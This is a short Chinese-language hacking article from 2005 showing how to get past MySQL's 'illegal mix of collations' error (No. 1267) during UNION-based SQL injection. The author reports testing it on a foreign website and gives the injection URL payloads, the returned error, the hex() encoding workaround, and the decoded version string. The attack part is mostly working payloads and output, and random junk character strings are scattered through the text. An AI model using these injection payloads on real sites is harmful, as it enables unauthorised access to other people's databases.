MySQL注射时ErrorNo.1267的突破

admin

本文作者：SuperHei
1 E% q) T+ Z8 i% Y7 H) Y文章性质：原创
) w* K: {6 i# _发布日期：2005-10-18
* H  g; {" }+ K- l6 o测试个国外的站时：
7 p3 F9 M  E0 c$ @url：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
返回错误：
4 ?* F+ F- w) q, ~# v, h, h5 U8 dIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
. w) a4 U5 C  R4 wMySQL Error No. 126
看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
  J+ I/ R3 O1 Y0 {& Q" Z解决办法：转为其他编码如hex。
url：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
成功得到hex(version())的值为：
* ?6 f. P- R& F5 H: A) j342E312E332D62657461
回Mysql查询下得到：
mysql> select 0x342E312E332D62657461;
+------------------------+
$ X/ D& U0 a1 s: G8 W| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta |
+------------------------+
1 row in set (0.00 sec)
! M& _) [" t. m' k8 ?